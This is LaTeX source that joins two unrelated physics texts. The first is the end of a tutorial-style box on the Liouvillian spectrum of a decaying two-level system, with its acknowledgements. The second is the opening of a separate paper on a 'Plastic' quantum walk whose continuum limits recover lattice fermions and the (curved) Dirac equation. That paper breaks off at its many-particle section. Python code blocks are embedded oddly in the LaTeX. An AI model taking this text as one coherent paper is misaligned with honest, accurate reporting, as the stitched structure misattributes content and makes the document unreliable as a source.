\framebox[15.5cm][l]{
\begin{minipage}[l]{15cm}
\vspace{0.25cm}
{\bf Box 8. Spectrum-analysis of the Liouvillian for the two-level system with decay.}
Here we diagonalise (\ref{eq:liou2}) and obtain its steady state. A Mathematica notebook solving this problem can be downloaded from \cite{notebook}. This specific case is straightforward to diagonalise, as the dimension of the system is very low. We obtain $4$ different eigenvalues: two of them are real, while the other two form a complex-conjugate pair. Figure \ref{fig:spectrum} displays the spectrum of the superoperator ${\cal L}$ given in (\ref{eq:liou2}).
\begin{center}
\includegraphics[scale=.9]{figure4}
\captionof{figure}{Spectrum of the Liouvillian matrix given by (\ref{eq:liou2}) for the general case of both coherent and incoherent dynamics ($\Gamma=0.2,\; n=1,\; \Omega=0,\; E=1$).}
\label{fig:spectrum}
\end{center}
As there is only one zero eigenvalue, we can conclude that there is only one steady state, and any initial density matrix will evolve towards it at infinite time. By selecting the right eigenvector corresponding to the zero eigenvalue and normalising it, we obtain the steady-state density matrix. This can even be done analytically. The result is the matrix:
\begin{equation}
\rho_{SS}=
\left(
\begin{array}{cc}
\frac{(1+n) \left(4\, E^2+(\Gamma +2 n\, \Gamma )^2\right)+4 (1+2 n) \Omega ^2}{(1+2 n) \left(4 \,E^2+(\Gamma +2 n \,\Gamma )^2+8 \Omega^2\right)} & \frac{2 (-2 \,E-i (\Gamma +2 n \Gamma )) \Omega }{(1+2 n) \left(4 \,E^2+(\Gamma +2 n \,\Gamma )^2+8 \,\Omega ^2\right)} \\
\frac{2 (-2 \,E+i (\Gamma +2 n\, \Gamma )) \Omega }{(1+2 n) \left(4\, E^2+(\Gamma +2 n\, \Gamma )^2+8 \Omega ^2\right)} & \frac{n \left(4E^2+(\Gamma +2 n \Gamma )^2\right)+4 (1+2 n) \Omega ^2}{(1+2 n) \left(4\, E^2+(\Gamma +2 n \Gamma )^2+8\, \Omega ^2\right)} \\
\end{array}
\right)
\end{equation}
\vspace{0.25cm}
\vspace{0.25cm}
\end{minipage}
}
\section{Acknowledgements}
The author wants to acknowledge the Spanish Ministry and the Agencia Espa{\~n}ola de Investigaci{\'o}n (AEI) for financial support under grant
FIS2017-84256-P (FEDER funds).
\section{Introduction}
\begin{figure}
{\center
\includegraphics[scale=0.8]{FigUnifiedQW.pdf}
}
\caption{{\em The Plastic QW} admits both a continuous-time discrete-space limit (to lattice fermions) and a continuous-spacetime limit (to the Dirac equation).}
\label{FigUnifiedQW}
\end{figure}
Confronted with the inefficiency of classical computers for simulating quantum particles, Feynman realized that one ought to use quantum computers instead \cite{FeynmanQC}. What better than a quantum system to simulate another quantum system? An important obstacle, however, is to understand to what extent quantum systems can be represented by discrete quantum models. Indeed, whenever we simulate a physical system on a classical computer, we first need a discrete model of the physical system ``in terms of bits'': a simulation algorithm. Similarly, quantum simulation requires a discrete quantum model of the quantum system ``in terms of qubits'': a quantum simulation algorithm.
In recent years, several such quantum simulation schemes have been devised \cite{JLP14,georgescu2014quantum, QuantumClassicalSim,HamiltonianBasedSchwinger}. Some of these were experimentally implemented \cite{BlattDirac}, including for interacting quantum particles \cite{InnsbruckLGT,ErezCiracLGT}. Most often these discrete models are Hamiltonian-based, meaning that they are discrete-space continuous-time ($\Delta_x\ \textrm{finite},\ \Delta_t\longrightarrow 0$). Their point of departure is always a discrete-space continuous-time reformulation of the target physical phenomenon (e.g. the Kogut-Susskind Hamiltonian~\cite{kogut1975hamiltonian} formulation of quantum electrodynamics). Next, they either look for a quantum system in nature that mimics this Hamiltonian, or they perform a staggered trotterization of it in order to obtain unitaries \cite{StrauchCTQW,ArrighiChiral}. But even when the Hamiltonian is trotterized, time steps need to remain orders of magnitude smaller than space steps ($\Delta_t\ll\Delta_x$). Thus, in either case, by having first discretized space alone and not time, Hamiltonian-based schemes take things back to the non-relativistic quantum mechanical setting: Lorentz-covariance is broken; the bounded speed of light can only be approximately recovered (via Lieb-Robinson bounds, with issues such as those pointed out in \cite{EisertSupersonic,Osborne19}). This also creates more subtle problems such as fermion doubling, where spurious particles are created due to the periodic nature of the momentum space on a lattice.
From a relativistic point of view it would be more natural to discretize space and time right from the start, simultaneously and with the same scale ($\Delta_x=\Delta_t\ \textrm{finite}$). The resulting quantum simulation scheme would then take the form of a network of local quantum gates, homogeneously repeated across space and time---a Quantum Cellular Automata (QCA). \cite{SchumacherWerner,ArrighiUCAUSAL,ArrighiPQCA}. Feynman himself introduced QCA right along with the idea of quantum simulation \cite{FeynmanQCA}. He had pursued similar ideas earlier on in the one-particle sector, with his attractively simple `checkerboard model' of the electron in discrete $(1+1)$--spacetime \cite{Feynman_chessboard}. Later, the one-particle sector of QCA became known as Quantum Walks (QW), and was found to provide quantum simulation schemes for non-interacting fundamental particles \cite{BenziSucci,birula,meyer1996quantum,di2016quantum} in $(3+1)$--spacetime \cite{ArrighiDirac,marquez2017fermion}, be it curved \cite{di2013quantum,ArrighiGRDirac,ArrighiGRDirac3D, mallick2019simulating} or not, or in the presence of an electromagnetic field \cite{MolfettaDebbasch2014Curved, CGW18} or more in general a Yang-Mills interaction \cite{arnault2016quantum}. Some of these were implemented \cite{WernerElectricQW,Sciarrino}. The sense in which QW are Lorentz-covariant was made explicit \cite{ArrighiLORENTZ, PaviaLORENTZ, PaviaLORENTZ2, DebbaschLORENTZ}. The bounded speed of light is very natural in circuit-based quantum simulation, as it is directly enforced by the wiring between the local quantum gates.
Yet, in spite of their many successes, discrete-spacetime models have so far fallen short of being able to account for realistic interacting QFT. The quantum simulation results over the multi-particle sector of QW (namely, QCA) are either abstract (e.g. universality \cite{ArrighiQGOL}) or phenomenological (e.g. molecular binding \cite{ahlbrecht2012molecular,PaviaMolecular}). An exception is \cite{ArrighiToyQED}, where contact is made with $(1+1)$--QED in two ways: by mimicking its construction and by informally recovering its main phenomenology. All this points to a core difficulty: there is no clear sense in which discrete-spacetime models of interacting particles have a continuum limit ($\Delta_x=\Delta_t\longrightarrow 0$); in fact it is not even clear that interacting QFT themselves have such a continuum limit. In many ways, the classical Lagrangian that serves as departure point of a QFT is but a partial prescription for a numerical scheme (e.g. a regularized Feynman path integral), whose convergence is often challenging (renormalization). Continuous spacetime does not seem to be the friendly place where QCA and QFT should meet.
Clearly, Hamiltonian-based and QCA-based simulation schemes both have their advantages. It would be nice to have the best of both worlds: a discrete-spacetime model ($\Delta_x=\Delta_t$\ \textrm{finite}) that would be plastic enough to support both a non-relativistic continuous-time discrete-space limit ($\Delta_x$\ \textrm{finite}, $\Delta_t\longrightarrow 0$), in order to establish contact with the discrete-space continuous-time formulation of the QFT, and a fully relativistic spacetime-continuum limit ($\Delta_x=\Delta_t\longrightarrow 0$). For a proof-of-concept we should aim for the free Dirac QFT first, and build a QW that converges both to its continuous-time discrete-space formulation (namely ``Lattice fermions'', i.e. the free part of the Kogut-Susskind Hamiltonian) and to its continuous-spacetime formulation (the Dirac equation). This is exactly what we achieve in this paper.
For our construction, we needed `plasticity', in the sense of a tunable speed of propagation. Indeed, intuitively, during the process where the continuous-time discrete-space limit is taken, whenever $\Delta_t$ gets halved relative to $\Delta_x$, so is the particle's speed---because it gets half the time to propagate. This in turn is analogous to a change of coordinates, relabelling event $(t,x)$ into $(2t,x)$ in General Relativity. In order to keep physical distances the same, a synchronous metric $g=\textrm{diag}(1,-g_{xx})$ then becomes $g'=\textrm{diag}(1,-4 g_{xx})$ under such a change of coordinates. The original curved Dirac QW \cite{di2013quantum} is precisely able to handle any synchronous metric in the massless case; this was the starting point of our construction. Numerous trial--and--error modifications were needed, however, in order to control the relative scalings of $\Delta_t$ and $\Delta_x$ and in order to handle the mass elegantly. No wonder, therefore, that our result handles the case of curved $(1+1)$--spacetime `for free'. Our QW yields an original curved lattice-fermions Hamiltonian, which has never appeared in the literature \cite{villegas2015lattice,yamamoto2014lattice}, in the continuous-time discrete-space limit, and the standard curved Dirac equation in the spacetime limit.
{\em Roadmap.} Section \ref{sec:themodel} presents the QW. Section \ref{sec:limits} shows the different limits it supports (see Fig \ref{FigUnifiedQW}). Section \ref{sec:curved} deals with synchronous curved $(1+1)$--spacetime. Section \ref{sec:qca} promotes the one-particle sector QW, to the many--non--interacting--particles sector, of a QCA. Section \ref{sec:conclusion} summarizes the results, and concludes.
\section{The model}\label{sec:themodel}
We consider a QW over the $(1+1)$--spacetime grid, which we refer to as the `Plastic QW'. Its coin or spin degree of freedom lies in $\mathcal{H}_2$, for which we may choose some orthonormal basis $\{\ket{v^-}, \ket{v^+}\}$. The overall state of the walker lies in the composite Hilbert space $\mathcal{H}_2\otimes \mathcal{H}_\mathbb{Z}$ and may thus be written $\Psi=\sum_l \psi^+(l) \ket{v_+}\otimes\ket{l} + \psi^-(l) \ket{v_-}\otimes\ket{l}$, where the scalar field $\psi^+$ (resp. $\psi^-$) gives, at every position $l\in \mathbb{Z}$, the amplitude of the particle being there and about to move left (resp. right). We use $(j,l) \in \mathbb{N} \times \mathbb{Z}$ to label respectively instants and points in space, and let:
\begin{equation}
\Psi_{j+2}=W \Psi_j
\label{eq:FDE0}
\end{equation}
where
\begin{equation}
W = \Lambda^{-\kappa} \hat{S}({\hat{C}_{-\zeta}}\otimes \text{Id}_\mathbb{Z}) \hat{S}(\hat{C}_{\zeta}\otimes \text{Id}_\mathbb{Z} )\Lambda^\kappa
\end{equation}
with
$\hat{S}$ a state-dependent shift operator such that
\begin{equation}
(\hat{S}\Psi)_{j,l} =\begin{pmatrix}\psi^+_{j,l+1}\\\psi^-_{j,l-1}\end{pmatrix},
\end{equation}
$\hat{C}_\zeta$ an element of $U(2)$ that depends on angles $\theta$ and $\zeta$,
\begin{equation}
\hat{C}_\zeta= \begin{pmatrix} -\cos \theta & e^{-i \zeta}\sin \theta \\
e^{i \zeta} \sin \theta & \cos \theta
\end{pmatrix}
\end{equation}
and $\Lambda$ another element of $U(2)$ that depends on $f^\pm =\sqrt{1-c}\pm\sqrt{c+1}$,
\begin{equation}
\Lambda = \frac{1}{2}\left(
\begin{array}{cc}
- f^- & f^+ \\
f^+ & f^- \\
\end{array}
\right).
\end{equation}
Later $c\in[0,1]$ will be interpreted as a speed of propagation or a hopping rate.
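For concreteness, one step of the walk can be sketched in a few lines of pure Python. As an illustration we simply fix $\kappa=1$ (decoupled from the scaling jets introduced below; since $\Lambda$ is both unitary and Hermitian, $\Lambda^{-1}=\Lambda$), take a periodic lattice, and pick arbitrary values for $c$, $m$ and $\varepsilon$; the check at the end confirms that the step is norm-preserving, as it must be for a unitary $W$:

```python
import math, cmath

N = 16                        # lattice sites (periodic boundary)
c, m, eps = 0.5, 0.3, 0.1     # speed, mass, epsilon (illustrative values)
theta = math.acos(c)          # kappa = 1  =>  cos(theta) = c * kappa
zeta = -m * eps / math.sin(theta)   # (-1)^kappa = -1 for kappa = 1

fm = math.sqrt(1 - c) - math.sqrt(1 + c)
fp = math.sqrt(1 - c) + math.sqrt(1 + c)
Lam = [[-fm / 2, fp / 2], [fp / 2, fm / 2]]   # unitary and Hermitian

def coin(M, psi):
    # Apply a 2x2 matrix to the coin of every site.
    return [(M[0][0] * p + M[0][1] * q, M[1][0] * p + M[1][1] * q)
            for p, q in psi]

def C(z):
    return [[-math.cos(theta), cmath.exp(-1j * z) * math.sin(theta)],
            [cmath.exp(1j * z) * math.sin(theta), math.cos(theta)]]

def shift(psi):
    # psi_plus hops in from the right neighbour, psi_minus from the left one.
    return [(psi[(l + 1) % N][0], psi[(l - 1) % N][1]) for l in range(N)]

def step(psi):
    # W = Lam^{-1} S (C_{-zeta}) S (C_{zeta}) Lam, applied right to left.
    for op in (lambda s: coin(Lam, s),
               lambda s: coin(C(zeta), s), shift,
               lambda s: coin(C(-zeta), s), shift,
               lambda s: coin(Lam, s)):
        psi = op(psi)
    return psi

psi = [(0, 0)] * N
psi[N // 2] = (1 / math.sqrt(2), 1j / math.sqrt(2))   # localised initial state
psi = step(psi)                                       # Psi_{j+2} = W Psi_j
norm = sum(abs(p) ** 2 + abs(q) ** 2 for p, q in psi)
print(norm)
```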
To investigate the continuous limit, we first introduce a time discretization step $\Delta_t$ and a space discretization step $\Delta_x$. We then introduce, for any parameter $a$ appearing in Eq. \eqref{eq:FDE0}, a field $\tilde a$ over the spacetime positions $\mathbb{R}^+ \times \mathbb{R}$, such that $a_{j,l}=\tilde a(t_j,x_l)$, with $t_j=j \Delta_t$, and $x_l = l \Delta_x$. Moreover the translation operator $\hat S$ will now proceed by $\Delta_x$ steps, so that
$(S\widetilde{\Psi})(x_l)=\left(\widetilde{\psi}^+(x_l+\Delta_x),\widetilde{\psi}^-(x_l-\Delta_x)\right)^\top$ i.e. $S\widetilde{\Psi}=\exp( i \sigma_z \Delta_x p )\widetilde{\Psi}$, with $p=- i \partial_x$.
Eq. \eqref{eq:FDE0} then reads:
\begin{equation}
\widetilde{\Psi}(t_j+2\Delta_t) = \widetilde{W}^{\theta}_{\zeta} \widetilde{\Psi}(t_j).
\label{eq:FDE2}
\end{equation}
Let us drop the tildes to lighten the notation. We suppose that all functions are $C^2$; for a more detailed analysis of the regularity condition which make these kinds of schemes convergent, the reader is referred to \cite{ArrighiDirac}.\\
Now, the continuum limit is the pair of differential equations obtained from Eq. \eqref{eq:FDE2} by letting both $\Delta_t$ and $\Delta_x$ go to zero. But how do we choose to let them go to zero, and what happens to the parameters then?
First, let us parametrize the time and space steps with a common $\varepsilon$:
\begin{equation}
\Delta_t = \varepsilon \hspace{1cm} \Delta_x = \varepsilon^{1-\alpha}\label{eq:scalings1}
\end{equation}
where $\alpha\in[0,1]$ will allow us to have $\Delta_t$ and $\Delta_x$ tend to zero differently.
Second, let us parametrize the positive real number $\kappa$, and the angles $\theta$, $\zeta$, by the same $\varepsilon$:
\begin{align}
\kappa&= \varepsilon^\alpha,\\
\theta &= \arccos(c \kappa),\\
\zeta & = m \frac{(-1)^{\kappa}\varepsilon }{\sin(\theta)}.
\label{eq:scalings2}
\end{align}
Later $m\geq 0$ will be interpreted as a mass.\\
Summarizing,
\begin{itemize}
\item $\varepsilon$ will be taken to zero, triggering the continuum limit;
\item $\alpha$ will remain fixed throughout the limit, governing which type of continuum limit is being taken;
\item $m, c$ will remain fixed throughout the limit, stating which mass and speed are being simulated;
\item $\Delta_t, \Delta_x, \kappa, \theta, \zeta$ will vary throughout the limit, entirely determined by the above four.
\end{itemize}
Notice that when we take the $\varepsilon\longrightarrow 0$ limit, $W$ remains unitary. For instance, focussing on the top-left entry of $C_\zeta$ we need $\cos \theta =c \varepsilon^\alpha \leq 1$, which requires that $\alpha \geq 0$ as already imposed.
Altogether, these jets define a family of QWs indexed by $\varepsilon$, whose embedding in spacetime, and defining angles, depend on $\varepsilon$. The continuum limit of Eq. \eqref{eq:FDE2} can then be investigated by Taylor expanding $\Psi(t,x)$ and $W^{\varepsilon,\alpha}$ for different values of $\alpha$.
\section{Continuum limit and scalings}\label{sec:limits}
Substituting for $\theta$ as in \eqref{eq:scalings2}, the coin operator reads
\begin{equation}
C^{\varepsilon,\alpha}_\zeta = \big(-\varepsilon^\alpha c \sigma_z + (\sigma_x \cos\zeta + \sigma_y \sin\zeta) \sqrt{1- c^2 \varepsilon^{2\alpha}} \big).
\label{eq:W0}
\end{equation}
\subparagraph{Case (i): $\mathbf{\alpha= 1.}$} In this case $\Delta_x = O(1)$ does not scale with $\varepsilon$, so the translation operator proceeds by fixed steps $\Delta_x$. At leading order, the operator $W^{\varepsilon,1}$ depends linearly on $\varepsilon$.
The coin operator $C_\zeta$ reads:
\begin{equation}
C^{\varepsilon,1}_\zeta \simeq - \varepsilon c \sigma_z + \sigma_x \cos(m \varepsilon)+ \sigma_y\sin(m \varepsilon) + O(\varepsilon^2).
\label{eq:W0C1}
\end{equation}
It is straightforward, after some simple algebra, to derive the evolution operator at zeroth order in $\varepsilon$:
\begin{equation}
W^{0,1} = \text{Id}.
\label{eq:case1}
\end{equation}
Then the evolution operator reads:
\begin{equation}
W^{\varepsilon,1} \simeq \text{Id} - 2 \varepsilon ( i c \sigma_x\sin(i \Delta_x\partial_x)e^{\Delta_x \sigma_z \partial_x } - i m \sigma_z) + O(\varepsilon^2)
\label{eq:case1bis}
\end{equation}
Replacing this into Eq.\eqref{eq:FDE2}, and expanding $\Psi$ around $(x,t)$ we obtain:
\begin{small}
\begin{align*}
&\Psi + 2\varepsilon \partial_t \Psi\\
&= ( \text{Id} - 2 \varepsilon i c \sigma_x\sin(i \Delta_x\partial_x)e^{\Delta_x \sigma_z \partial_x } +2 i \varepsilon m \sigma_z)\Psi + O(\varepsilon^2) \label{eq:casei}
\end{align*}
\end{small}
In the formal limit when $\varepsilon \longrightarrow 0$ this coincides with the Hamiltonian equation:
\begin{equation}
i \partial_t \Psi = H_L \Psi
\end{equation}
where
\begin{equation}
H_L = c \sigma_x\sin(i \Delta_x\partial_x)e^{\Delta_x \sigma_z \partial_x } - m \sigma_z.
\label{eq:case1eq}
\end{equation}
This $H_L$ is precisely the Dirac Hamiltonian in the vacuum for a lattice fermion on a one-dimensional grid (up to some minor re-encoding depending on conventions, see Sec. V for more details), i.e. the continuous-time discrete-space counterpart of the Dirac equation\footnote{Notice that $H_L$ commutes with $\sigma_x$, thus preserving the chiral symmetry w.r.t.\ the components of the spinor $\Psi = (\psi^+,\psi^-)^\top$. This will no longer be true when we introduce the mass, which notoriously breaks chirality.}.
Indeed, the standard Dirac equation in continuous spacetime can be recovered at the level of \eqref{eq:case1eq} by setting $\Delta_x=\epsilon$ a posteriori, and computing the leading order of the expansion around $\epsilon=0$, which is
$i \partial_t \Psi =( c \sigma_x \partial_x - m\sigma_z )\Psi + O(\epsilon^2)$, i.e. in the formal limit when $\epsilon \longrightarrow 0$,
\begin{align*}
i \partial_t \Psi &= H_D \Psi\\
H_D &= c \sigma_x \partial_x - m\sigma_z
\end{align*}
Can we get to $H_D$ directly?
\subparagraph{Case (ii): $0<\alpha<1$.}
In this case the leading order of the translation operator is
\begin{equation}
\hat{S}\simeq (\text{Id} + \varepsilon^{1-\alpha} \sigma_z \partial_x),
\end{equation}
whereas that of the coin operator is:
\begin{equation}
C^{\varepsilon,\alpha}_\zeta = \big(-\varepsilon^\alpha c \sigma_z + (\sigma_x \cos\zeta + \sigma_y \sin\zeta) \sqrt{1- c^2 \varepsilon^{2\alpha}} \big).
\label{eq:W0bis}
\end{equation}
The leading order of the Taylor expansion of the evolution operator reads:
\begin{equation}
W^{\varepsilon,\alpha} \simeq \text{Id} + 2 \varepsilon (-i c \sigma_x \partial_x + i m \sigma_z)+ O(\varepsilon^{1+\alpha})
\label{eq:case2}
\end{equation}
which directly recovers the standard massive Dirac equation in continuous time:
\begin{equation}
i \partial_t \Psi = H_D \Psi.
\end{equation}
Notice that this result arises from the fact that the leading orders are given by terms of the kind $c \varepsilon^{\alpha} \varepsilon^{1-\alpha}\partial_x$, which no longer depend on $\alpha$, for a final result of order $O(\varepsilon)$.
Thus asking that $0 <\alpha < 1$, and thereby enforcing that $\Delta_t\longrightarrow 0$ faster than $\Delta_x\longrightarrow 0$, yields the same result as letting $\Delta_t\longrightarrow 0$, and then $\Delta_x\longrightarrow 0$, successively. Now, what if we let both of them go to zero at the same rate?
\subparagraph{Case (iii): $\alpha=0$.} In this case the leading order of the translation operator is
\begin{equation}
\hat{S} \simeq (\text{Id} + \varepsilon \sigma_z \partial_x) + O(\varepsilon^2),
\end{equation}
and the quantum coin becomes:
\begin{equation}
C^{\varepsilon,0}_\zeta = -\sigma_z c + (\sigma_x \cos\zeta +\sigma_y \sin\zeta) \sqrt{1- c^2} .
\end{equation}
This special case is, in some sense, opposite to Case (i), where the coin operator scaled with $\varepsilon$ and the shift operator was independent of it. The leading order in $\varepsilon$ of the evolution operator leads to:
\begin{equation}
W^{\varepsilon,0} \simeq \text{Id} + 2\varepsilon\Lambda \left( -i c \sigma_x \partial_x + i m \sigma_z \right)\Lambda^{-1} + O(\varepsilon^{2}).
\label{eq:case3}
\end{equation}
Again the formal limit yields
\begin{align*}
i \partial_t \Psi &= H_D \Psi.
\end{align*}
Summarizing the results so far:
\begin{theorem}\label{th:limits} Fix $m\geq 0$, $c\in [0,1]$. For different values of $\alpha\in [0,1]$, consider the family of QWs, parametrized by $\varepsilon\geq 0$:
\begin{equation}
\Psi(t_j+2\Delta_t)=W^{\varepsilon,\alpha}\Psi(t_j)
\label{eq:FDE}
\end{equation}
where
\begin{equation}
W^{\varepsilon,\alpha} = \Lambda^{-\kappa} \hat{S}({\hat{C}_{-\zeta}}\otimes \text{Id}_\mathbb{Z}) \hat{S}(\hat{C}_{\zeta}\otimes \text{Id}_\mathbb{Z} )\Lambda^\kappa
\end{equation}
with
\begin{equation}
\hat{S}=\exp(\sigma_z\Delta_x \partial_x),
\end{equation}
\begin{equation}
\hat{C}_{\zeta}= \begin{pmatrix} - \cos \theta & e^{-i \zeta}\sin \theta \\
e^{i \zeta} \sin \theta & \cos \theta
\end{pmatrix},
\end{equation}
\begin{equation}
\Lambda = \frac{1}{2}\left(
\begin{array}{cc}
- f^- & f^+ \\
f^+ & f^- \\
\end{array}
\right), f^\pm =\sqrt{1-c}\pm\sqrt{c+1},
\end{equation}
\begin{align}
\kappa&= \varepsilon^\alpha,\\
\theta &= \arccos(c \kappa),\\
\zeta & = m \frac{(-1)^{\kappa}\varepsilon }{\sin(\theta)}.
\end{align}
For any $0\leq\alpha\leq 1$, the $\varepsilon$--parametrized family admits a continuous time limit as $\varepsilon\longrightarrow 0$. For $\alpha =1$, this continuous-time limit is discrete in space. For $0\leq\alpha<1$ this continuous-time limit is also continuous in space.
\begin{small}
\[ i \partial_t \Psi = c \sigma_x\sin(i \Delta_x\partial_x)e^{\Delta_x \sigma_z \partial_x }\Psi - m \sigma_z\Psi , \hspace{1cm} \text{for} \hspace{0.2cm} \alpha = 1.\]
\[ i \partial_t \Psi = c \sigma_x \partial_x\Psi - m\sigma_z \Psi , \hspace{1.7cm} \text{for} \hspace{0.2cm} 0\leq \alpha < 1\]
\end{small}
\label{theo1}
In both cases, the continuum limit is the differential equation corresponding to a massive Dirac fermion with mass $m$ and propagating at speed $c$.
\end{theorem}
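As a quick numerical sanity check of the objects appearing in Th.~\ref{th:limits}, the following Python sketch (with arbitrary illustrative values of $m$, $c$, $\varepsilon$, $\alpha$, and dropping the $(-1)^{\kappa}$ phase in $\zeta$, which plays no role for this check) verifies that the coin $\hat{C}_{\zeta}$ is unitary and that $\Lambda$ is invertible, with $\det\Lambda=-1$ independently of $c$:

```python
import numpy as np

# Illustrative parameter values; any m >= 0, c in [0,1], small eps > 0 work.
m, c, eps, alpha = 0.7, 0.6, 1e-3, 0.5
kappa = eps**alpha
theta = np.arccos(c * kappa)
zeta = m * eps / np.sin(theta)   # dropping the (-1)^kappa phase for this check

# The coin C_zeta of the theorem
C = np.array([[-np.cos(theta), np.exp(-1j * zeta) * np.sin(theta)],
              [np.exp(1j * zeta) * np.sin(theta), np.cos(theta)]])

# The change-of-basis Lambda, with f^pm = sqrt(1-c) pm sqrt(1+c)
fp = np.sqrt(1 - c) + np.sqrt(1 + c)
fm = np.sqrt(1 - c) - np.sqrt(1 + c)
Lam = 0.5 * np.array([[-fm, fp], [fp, fm]])

assert np.allclose(C @ C.conj().T, np.eye(2))   # coin is unitary
assert np.isclose(np.linalg.det(Lam), -1.0)     # Lambda invertible, det = -1
```

Since $(f^+)^2+(f^-)^2=4$, the determinant of $\Lambda$ equals $-1$ for every admissible $c$, so $\Lambda^{\pm\kappa}$ is well defined.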
\section{Introducing a non homogeneous hopping rate $c$}\label{sec:curved}
The aim of this section is to generalize Th. \ref{theo1} to an inhomogeneous speed of propagation, or hopping rate, $c(t,x)$. In the continuous spacetime limit this corresponds to introducing a non-vanishing spacetime curvature. We will see that the spacetime-dependence of $c$ leads to supplementary terms in the expansion of $W^{\varepsilon,\alpha}_{\zeta}$, proportional to $\Psi\partial_a C^{\varepsilon,\alpha}$ with $a \in \{x, t\}$. Let us look at each of the above cases.
Keeping the same scaling laws and dynamical equations as in Th. \ref{theo1}, we just need to generalise \eqref{eq:scalings2} as follows:
\begin{align}
\theta(t,x) &= \arccos(c(t,x) \kappa)\\
\zeta(t,x) & = m \frac{(-1)^{\kappa}\varepsilon }{\sin(\theta(t,x))}
\label{eq:scalings2bis}
\end{align}
Again we assume that $c(t,x)$ is in $C^2$.
As in the previous section, we distinguish several $\varepsilon$--parametrized families of QWs, for different values of $\alpha$.
\subparagraph{Case (i'):} $\alpha= 1$. The translation operator again no longer depends on $\varepsilon$. We have that
\begin{equation}
W^{\varepsilon,1}_{\zeta} = \text{Id} - 2 \varepsilon (\{e^{\Delta_x \sigma_z \partial_x} \sigma_x, e^{\Delta_x \sigma_z \partial_x} c(t,x)\sigma_z\} - i m \sigma_z) + O(\varepsilon^2)
\end{equation} where $\{\cdot,\cdot\}$ denotes the anticommutator.
Replacing this once again into Eq.\eqref{eq:FDE2}, expanding $\Psi$ around $(x,t)$ and taking the formal limit for $\varepsilon \longrightarrow 0$, we recover the following Hamiltonian equation:
\begin{align*}
i \partial_t \Psi &= H_L(x,t) \Psi\\
H_L &= -i \{e^{\Delta_x \sigma_z \partial_x} \sigma_x, e^{\Delta_x \sigma_z \partial_x} c(t,x)\sigma_z\} - m\sigma_z .
\end{align*}
Quite surprisingly, by setting $\Delta_x=\varepsilon$ a posteriori, we recover the curved massive Dirac equation in $(1+1)$--dimensional spacetime:
\begin{equation}
i \partial_t \Psi = c\,\sigma_x\partial_x \Psi + \frac{\sigma_x}{2}(\partial_x c)\, \Psi - m \sigma_z \Psi
\end{equation}
This suggests that \textbf{Case (i')} may be a simple way to simulate the Dirac equation in a curved spacetime by the implementation of a continuous-time discrete-space QW, which to the best of our knowledge is an original result.
Again we can get to the same PDE directly by setting $0\leq\alpha<1$. Indeed, \textbf{Case (ii')} and \textbf{Case (iii')} are analogous to the homogeneous case, except for a supplementary term in the PDE given by the spatial derivative of the coin, $W^{\varepsilon,\alpha}_{m} \simeq W_m^{\varepsilon,\alpha} + \frac{1}{2} \partial_x W_{0} ^{\varepsilon,\alpha}$. It is tedious but straightforward to verify that Th. \ref{theo1} generalises as follows:
\begin{theorem} \label{th:curvedlimits}
Fix $m\geq 0$ and a hopping rate $c(t,x)\in [0,1]$ of class $C^2$. For different values of $\alpha\in [0,1]$, consider the family of QWs, parametrized by $\varepsilon\geq 0$:
\begin{equation}
\Psi(t_j+2\Delta_t)=W^{\varepsilon,\alpha}\Psi(t_j)
\label{eq:FDE3}
\end{equation}
where
\begin{equation}
W^{\varepsilon,\alpha} = \Lambda^{-\kappa} \hat{S}({\hat{C}_{-\zeta}}\otimes \text{Id}_\mathbb{Z}) \hat{S}(\hat{C}_{\zeta}\otimes \text{Id}_\mathbb{Z} )\Lambda^\kappa
\end{equation}
with
\begin{equation}
\hat{S}=\exp(\sigma_z\Delta_x \partial_x),
\end{equation}
\begin{equation}
\hat{C}_{\zeta}= \begin{pmatrix} - \cos \theta & e^{-i \zeta}\sin \theta \\
e^{i \zeta} \sin \theta & \cos \theta
\end{pmatrix},
\end{equation}
\begin{equation}
\Lambda = \frac{1}{2}\left(
\begin{array}{cc}
- f^- & f^+ \\
f^+ & f^- \\
\end{array}
\right), f^\pm =\sqrt{1-c}\pm\sqrt{c+1},
\end{equation}
\begin{align}
\kappa&= \varepsilon^\alpha,\\
\theta(t,x) &= \arccos(c(t,x) \kappa),\\
\zeta(t,x) & = m \frac{(-1)^{\kappa}\varepsilon }{\sin(\theta(t,x))}.
\end{align}
For any $0\leq\alpha\leq 1$, the $\varepsilon$--parametrized family admits a continuous time limit as $\varepsilon\longrightarrow 0$. For $\alpha =1$, this continuous-time limit is discrete in space. For $0\leq\alpha<1$ this continuous-time limit is also continuous in space.
\begin{small}
\[ i \partial_t \Psi = -i \{e^{\Delta_x \sigma_z \partial_x} \sigma_x, e^{\Delta_x \sigma_z \partial_x} c(t,x)\sigma_z\}\Psi - m\sigma_z\Psi , \hspace{0.55cm} \text{for} \hspace{0.2cm} \alpha = 1\]
\[ i \partial_t \Psi = c(t,x) \sigma_x \partial_x \Psi + \sigma_x \Psi \frac{1}{2}\partial_x c(t,x) - m \sigma_z \Psi, \hspace{0.5cm} \text{for} \hspace{0.2cm} 0\leq \alpha < 1\]
\end{small}
\label{theo2}
In both cases, the continuum limit is the differential equation for a massive Dirac fermion propagating on an arbitrary curved spacetime, in synchronous coordinates---i.e. coordinates in which the metric tensor has coefficients $g^{00}=1$, $g^{01}=g^{10}=0$ and $g^{11}=-\frac{1}{c(x,t)^2}$.
\end{theorem}
\section{Many-particle model}\label{sec:qca}
Let us now extend our formalism to the multi-particle sector. We will construct a `Plastic' Quantum Cellular Automaton (QCA) in $(1+1)$--dimensions, aiming to model non-interacting Dirac fermions. It could be argued that the Plastic QCA will be nothing but many Plastic QWs weaved together, which is true of course. Still, this implies a not so obvious shift in mathematical formalism, and constitutes a mandatory prior step in order to later approach the modelling of interacting QFTs.\\
\begin{figure}
{\centering
\includegraphics[scale=0.3]{FigDirac2.pdf}
\caption{{\em The Plastic QCA.}\label{fig:QCA} A layer of $U$ is applied, alternated with a swap, then a layer of $U^*$, and a swap again.}
}
\end{figure}
For this Plastic QCA we adopt the conventions depicted in Fig.~\ref{fig:QCA}. Each red (resp. black) wire carries a qubit, which codes for the presence or absence of a left-moving (resp. right-moving) electron. The cells are located right at the crossings (or right afterwards). Therefore their Hilbert space is ${\cal H}={\cal H}_L\otimes{\cal H}_R$ with ${\cal H}_L={\cal H}_R=\mathbb{C}^2$, i.e. they are made out of two subcells, accounting for the left-moving and right-moving modes respectively.\\
